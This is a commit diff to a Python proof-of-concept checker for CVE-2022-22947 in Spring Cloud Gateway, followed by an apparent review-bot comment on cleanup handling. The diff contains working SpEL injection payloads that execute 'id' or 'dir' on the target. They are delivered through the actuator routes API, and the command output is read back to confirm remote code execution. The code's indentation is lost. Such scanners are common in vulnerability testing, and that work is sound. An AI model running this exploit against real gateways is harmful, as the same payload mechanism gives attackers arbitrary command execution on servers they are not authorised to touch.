
Commit 9ed3c97

authored
Update poc.py
1 parent 0d1747b commit 9ed3c97


1 file changed

+15
-13
lines changed

1 file changed

+15
-13
lines changed

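--- a/inc/poc.py
+++ b/inc/poc.py
@@ -109,40 +109,42 @@ def CVE_2022_22947(url, proxies):
 'Content-Type': 'application/x-www-form-urlencoded'
 }
 
-payload = '''{\r
+payload_windows = '''{\r
 "id": "hacktest",\r
 "filters": [{\r
 "name": "AddResponseHeader",\r
-"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
-}],\r
-"uri": "http://example.com",\r
-"order": 0\r
-}'''
-
-payload2 = '''{\r
-"id": "hacktest",\r
-"filters": [{\r
-"name": "AddResponseHeader",\r
-"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
+"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"dir\\"}).getInputStream()))}"}\r
 }],\r
 "uri": "http://example.com",\r
 "order": 0\r
 }'''
+payload_linux = payload_windows.replace('dir', 'id')
 
 try:
 requests.packages.urllib3.disable_warnings()
-re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
+re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_linux, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
 re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 if ('uid=' in str(re3.text)) and ('gid=' in str(re3.text)) and ('groups=' in str(re3.text)):
 cprint(f'[+] [CVE-2022-22947] {url}', "red")
 f2 = open("vulout.txt", "a")
 f2.write("[+] [CVE-2022-22947] " + url + '\n')
 f2.close()
+else:
 re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_windows, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
+re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+if ('<DIR>' in str(re3.text)):
+cprint(f'[+] [CVE-2022-22947] {url}', "red")
+f2 = open("vulout.txt", "a")
+f2.write("[+] [CVE-2022-22947] " + url + '\n')
+f2.close()
 else:
 cprint("[-] 目标 " + url + " 验证CVE-2022-22947漏洞不存在", "yellow")
+re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=5 ,verify=False, proxies=proxies)
+re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=5 ,verify=False, proxies=proxies)
 except KeyboardInterrupt:
 print("Ctrl + C 手动终止了进程")
 sys.exit()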
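Review bot: The `hacktest` route this check registers on the tested gateway is not guaranteed to be removed. The delete/refresh pair added at new lines 146–147 is ordinary sequential code, so a timeout or connection error raised by any earlier `requests` call skips it and leaves a route with a command-executing filter in place on the system under test. Only `KeyboardInterrupt` is handled in the visible part of the `try`; the function body starts before the hunk and the `try` may continue past it. The page has also lost the indentation, so I cannot confirm that the Linux-positive branch reaches those two lines. I would put the final delete and refresh in a `finally:` clause of this `try` so the cleanup runs once on every outcome. Separately, the result-recording block is now duplicated, and writing it once as `with open("vulout.txt", "a") as f2:` would close the file even if the write fails.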
